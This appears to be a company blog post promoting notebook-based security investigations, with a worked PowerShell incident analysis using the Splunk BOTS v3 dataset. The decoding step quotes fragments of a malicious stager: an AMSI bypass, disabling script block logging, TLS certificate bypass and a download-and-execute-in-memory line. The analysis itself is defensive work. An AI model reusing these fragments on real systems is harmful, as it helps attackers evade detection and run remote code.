Structuring Security Deep Dives with Notebooks

An example of how notebooks can help analysts quickly identify and report cyber incidents.

In today’s cybersecurity environment, analysts must navigate through vast amounts of data to uncover actionable insights quickly. Traditional SIEM platforms like Splunk have long been trusted for security operations, offering familiar, point-and-click interfaces. However, these systems can result in repetitive tasks, a lack of context, and inefficiencies, especially when performing deep security investigations. This post explores how a notebook-driven approach can streamline workflows and make investigations more organized, efficient, and collaborative.

Introduction

Traditional SIEM tools—while excellent for real-time monitoring and alerting—are built around point-and-click workflows. These interfaces work well for predefined tasks but often struggle to support the deep, iterative nature of real-world security investigations. Each query, filter, and pivot exists in isolation, leading to fragmented workflows, lost context, and inefficiencies that compound over time.

By contrast, a notebook-driven approach treats investigation as code. Every step, from data exploration to visualization, is captured in a living document. This makes your process not only executed but also documented, versioned, and repeatable—transforming security analysis into a dynamic, organized process rather than a series of isolated actions.

While transitioning to a notebook-first approach can feel like a significant shift, there are some clear benefits. Let’s look at why this change is worth considering.

Benefits of a Notebook-Driven Approach

1. Streamlined Investigations

I need to filter by that host_id... but where did I find it? Was it in this tab or that one? Click. Click. Click. Ah, there it is. Wait, that's not it. Got it now. Now, where's that query?

Tab Hell: A condition resulting from dozens of tabs containing dozens of queries across several sources. Symptoms include duplicated work, watery eyes, loss of information, and, in severe cases a strong urge to flip tables.

This kind of frustration is all too familiar in traditional SIEM tools, especially when you're working with multiple data sources or refining queries. You end up juggling tabs, duplicating them to preserve your query state, and struggling to track progress.

With a notebook-driven approach every step of your investigation lives in its own cell. Need to reference something from earlier? Simply scroll up. Want to try a new iteration? Just add a new cell. This approach keeps your investigation organized, saves you time, and makes your work easier to build, read, and debug.

2. Continuous Improvement

Investigations often involve repetitive work, which is necessary for getting results quickly—optimization comes later. Traditional tools often discard methods after an investigation, forcing a restart next time.

Notebooks solve this by recording each step in code, ensuring full reproducibility. As investigations accumulate, methods improve, refining efficiency and accuracy. This evolving framework reduces redundancy, saves time, and strengthens the investigative process.

3. Documentation-as-Code

How often do you find yourself scrambling to document your findings, hoping you captured every important detail? Traditional methods of documentation—screenshots, notes, emails—is cumbersome, error-prone, and disconnected from your actual work. Notebooks solve this by treating documentation as code, automatically recording queries, analyses, and insights in real time.

With inline Markdown, analysts can add context directly alongside their work, creating a structured, reproducible record. Findings can be shared effortlessly via PDF export or notebook links, ensuring accuracy and collaboration without extra effort.

4. Real-Time Collaboration

Investigations thrive on collaboration, but traditional tools rely on scattered emails, Slack threads, and dashboards.

Cloud notebook environments like Databricks and Google Colab enable real-time collaboration, turning investigations into shared, instantly updated workspaces. No more searching for messages—everything is documented and accessible in one place.

For non-cloud platforms, you can track changes and ensure reproducibility via version-control. While not fully real-time, they maintain a clear audit trail.

A Day-in-the-Life: PowerShell Incident Investigation

Next, let’s explore what a notebook-driven investigation might look like, using a pseudo-real-world example based on data and scenarios from the Splunk Boss of the SOC (BOTS) Dataset Version 3 (GitHub).

If you'd like to follow along or explore the full notebook yourself, you can access it here.

The Scenario

Our security team has received an alert about suspicious PowerShell activity on a Windows endpoint. PowerShell is a powerful scripting tool, but it's also frequently abused by attackers. We need to investigate:

What commands were executed?
Who ran them?
Was this activity malicious?

Using a notebook-driven approach, we can systematically analyze Windows Event Logs, track the attacker’s actions, and uncover key details.

Step 1: Loading and Exploring Windows Event Logs

We begin by loading the Windows Event Logs from the windows_wineventlog_silver table in our security lakehouse. This table contains various event types, including process executions and script block logs—providing a solid foundation for our investigation.

# Load the Windows Event Logs dataset
windows_logs = spark.table("windows_wineventlog_silver")

_event_time	host	EventCode	ProcessCommandLine
2018-08-20 09:03:52	BGIST-L	4689
2018-08-20 09:04:00	BTUN-L	4673
2018-08-20 09:04:00	BTUN-L	4688	"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
2018-08-20 09:04:01	BTUN-L	4689
2018-08-20 09:04:13	BSTOLL-L	5156

Step 2: Filtering for PowerShell Activity

We focus on Event ID 4104, which logs PowerShell script blocks executed on the system. We’ll also capture entries containing PowerShell-related strings and then review the sample records after applying the filters.

# Filter for PowerShell Script Block Logging (Event ID 4104)
windows_powershell_logs = (
  df_wineventlog
  .filter((col("EventCode") == 4104) | (col("EventCode") == 4688))
  .filter(
      lower(col("ProcessCommandLine")).contains("powershell") |
      lower(col("ProcessCommandLine")).rlike(
      "(Invoke-WebRequest|Base64|IEX|DownloadString)"
      )
  )
  .select("_event_time", "host", "EventCode", "ProcessCommandLine", "Message")
)

show_sample(windows_powershell_logs)

At this point, we uncover a list of PowerShell commands executed by a suspicious user account. Some of these commands appear obfuscated, which is a common evasion tactic used by attackers.

host	ProcessCommandLine
MKRAEUS-L	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" install "Microsoft.PowerShell.Commands.Util...
MKRAEUS-L	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" install "Microsoft.PowerShell.Security, Ver...
ABUNGST-L	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQB...
FYODOR-L	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -enc SQBGACgAJABQAF...
FYODOR-L	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:So...

Step 3: Counting Activity by Host

We have 18 PowerShell events in hand originating with several different hosts, but what do we know about these hosts? Let's start by grabbing a count of these events by host.

(
  windows_powershell_logs
  .groupBy("host")
  .count()
)

host	count
FYODOR-L	9
ABUNGST-L	3
MKRAEUS-L	2
BSTOLL-L	2
BGIST-L	2

We see that FYODOR-L performed more of these executions than other hosts, but do we know if the behavior of his executions differed from the others?

Step 4: Comparing FYODOR-L's Behavior

To see how FYODOR-L's behavior compares to their peers, we'll create a custom function called get_word_differences and compare the word frequencies in the ProcessCommandLine entries for FYODOR-L against those from all other hosts.

def get_word_differences(df, string_field, filter_field, filter_pattern):

    non_user_df = df.filter(~F.col(filter_field).like(f"%{filter_pattern}%"))
    user_df = df.filter(F.col(filter_field).like(f"%{filter_pattern}%"))

    # Compute word frequencies
    non_user_set = (
        get_word_frequencies(non_user_df, string_field, top_n=0, min_word_length=4)
        .withColumn(
            "percentage",
            F.col("frequency") / F.sum("frequency").over(window_spec)
            )
        )

    user_set = (
        get_word_frequencies(user_df, string_field, top_n=0, min_word_length=4)
        .withColumn(
            "user_percentage",
            F.col("frequency") / F.sum("frequency").over(window_spec)
            )
    )

    # Join, calculate difference, and order by impact
    return (
        non_user_set.
        join(user_set, on="word", how="outer")
        .withColumn(
            "percentage_diff",
            F.col("user_percentage") - F.col("percentage")
            )
        .select(
            F.lit(filter_pattern).alias(filter_field),
            "word", "percentage", "user_percentage", "percentage_diff"
        )
    )

# Execute and display
host_diff_df = get_word_differences(
    df=windows_powershell_logs,
    string_field="ProcessCommandLine",
    filter_field="host",
    filter_pattern="FYODOR-L")

host_diff_df.limit(10).display()

Host	Word	Typical Usage%	FYODOR-L Usage%	Usage Diff.
FYODOR-L	*hidden*	0%	7.8%	7.8%
FYODOR-L	*noni*	0%	7.8%	7.8%
FYODOR-L	debug	0%	3.4%	3.4%
FYODOR-L	software	0%	3.4%	3.4%
FYODOR-L	update	0%	3.4%	3.4%
FYODOR-L	getstring	0%	1.7%	1.7%
FYODOR-L	hkcu	0%	1.7%	1.7%
FYODOR-L	frombase64string	0%	1.7%	1.7%
FYODOR-L	hklm	0%	1.7%	1.7%
FYODOR-L	*encoding*	0%	1.7%	1.7%

The analysis reveals something interesting: FYODOR-L is far more likely to use terms like hidden, noni (implying non-interactive mode), and encoding. These words indicate that this host may be executing commands in a concealed, obfuscated manner.

Step 5. Taking a Closer Look at FYODOR-L

Given the anomalies in FYODOR-L’s command patterns, I’m going to zoom in further on their activity, and filter the logs down to executions from FYODOR-L that are hidden. This deeper dive should show us how these commands are being used.

fyodor_commands = (
  windows_powershell_logs
  .filter("host like '%FYODOR-L%'")
  .filter("Message like '%hidden%'")
)

This query returns three records that show FYODOR-L running hidden commands in non-interactive mode with encoded data attached.

Next, we can take the first record we see...

suspicious_record = fyodor_commands.collect()[0]

_event_time	ProcessCommandLine
2018-08-20 10:15:27	powershell.exe -NonI -W hidden -enc SQBGACgAJABQAFMAVgBlA...

Extract the encoded data...

import base64

encoded_string = suspicious_record['ProcessCommandLine'].split('-enc ')[1]

decoded_string = (
    base64.b64decode(encoded_string)
    .decode('UTF-16')
)

print(decoded_string)

Decoded String

Well that looks like a mess, but at least it's readable! Let's break this down one piece at a time and see what's going on here:

Stage 1 - Security Control Disablement:

Checks PowerShell version 3 or greater if($psversiontable.psversion.major -ge 3)
Disables PowerShell Script Block Logging through group policy manipulation $gpc['scriptblocklogging']['enablescriptblocklogging']=0; $gpc['scriptblocklogging']['enablescriptblockinvocationlogging']=0
Disables AMSI (Anti-Malware Scan Interface) by forcing initialization failure $ref=[ref].assembly.gettype('system.management.automation.amsiutils'); $ref.getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true);

Stage 2 - Network Configuration:

Sets up WebClient with SSL/TLS validation bypass [system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};
Configures proxy settings for network traversal $wc.proxy=[system.net.webrequest]::defaultwebproxy; $wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;

Stage 3 - Encrypted Command Execution:

Implements custom encryption key and RC4-like algorithm $k=[system.text.encoding]::ascii.getbytes('1abyk6z4+vvu%o5}8&m-9ul~l|>0gp');
Downloads encrypted payload from encoded URL and executes in memory $data=$wc.downloaddata($ser+$t); -join[char[]](& $r $data ($iv+$k))|iex

Step 6: Wrapping Up the Investigation

By using a notebook-driven approach, we were able to:

✅ Systematically filter and analyze event logs

✅ Identify suspicious PowerShell execution

✅ Decode obfuscated scripts to reveal malicious intent

✅ Track process execution and uncover the attack chain

As a last step we can simply export the notebook as a report - it's already a beautifully annotated document that clearly explains the attack sequence to any future viewer. No screenshots required.

How Do I Get Familiar with Notebooks?

If you're interested in adopting a notebook-driven approach to cybersecurity investigations, here are a few steps to get started:

Explore Notebook Platforms: If you want to get your hands dirty as quickly as possible, running pip install jupyter and jupyter notebook in a Python environment will pull up a notebook context for you. Google Colab hosts Jupyter Notebooks free of charge with limited access to compute. Notebooks are also native to the Databricks ecosystem and can be used there as well.
Leverage Example Notebooks: Many notebook platforms such as those listed above come with example notebooks. Exploring these examples will show you how others structure their analyses in this type of environment. For more of a peek into what Cyber Analytics might look like you can use the example we just ran through, and we'll be posting additional examples in future blogs.
Grab a template use-case: There are plenty of open datasets that can be used to launch a sample investigation and get familiar with tools along the way. Having a goal in mind (like a question from a Splunk BOTS challenge) is a wonderful help to make sure that your using the tools to keep you moving towards an objective.

Conclusion

Moving to a notebook-driven approach for investigations is about more than adopting a new tool—it’s about embracing an efficient, organized, and collaborative method for security analysis. By streamlining workflows, automating documentation, and enabling real-time collaboration, you can improve the quality and speed of your investigations.

We encourage you to experiment with this approach. Start with a pilot project and see firsthand how it can transform your operations. Once you experience the benefits, you might find it hard to go back.

Latest Articles

Read more about the latest and greatest work Rearc has been up to.

Model Context Protocol (MCP) Bridge for AI

Overview of what is MCP

MCP

AGENTIC AI

Seven Default Databricks Settings to Change

Review seven default settings you should change in Databricks

databricks

data

infrastructure

Databricks’ Gartner Win and the DAIS 2025 Announcements That Explain It

Databricks' recent Gartner Magic Quadrant leadership win is explained by their comprehensive DAIS 2025 announcements including MLFlow 3.0, AgentBricks, Lakebase, and serverless GPU support that create a unified platform for enterprise GenAI applications.

DAIS 2025

Databricks

GenAI

Data and AI Summit 2025 Roundup

This article is a concise recap of Databricks’ DAIS 2025 keynotes, highlighting the launch of a free training tier, Agent Bricks for AI agents, GA Databricks Apps, Lakebase preview, and serverless GPUs—framed around how these innovations accelerate secure, compliant AI and data workflows in financial services.

Data

Announcement

Next steps

Ready to talk about your next project?

Tell us more about your custom needs.

We’ll get back to you, really fast

Kick-off meeting

Let's Talk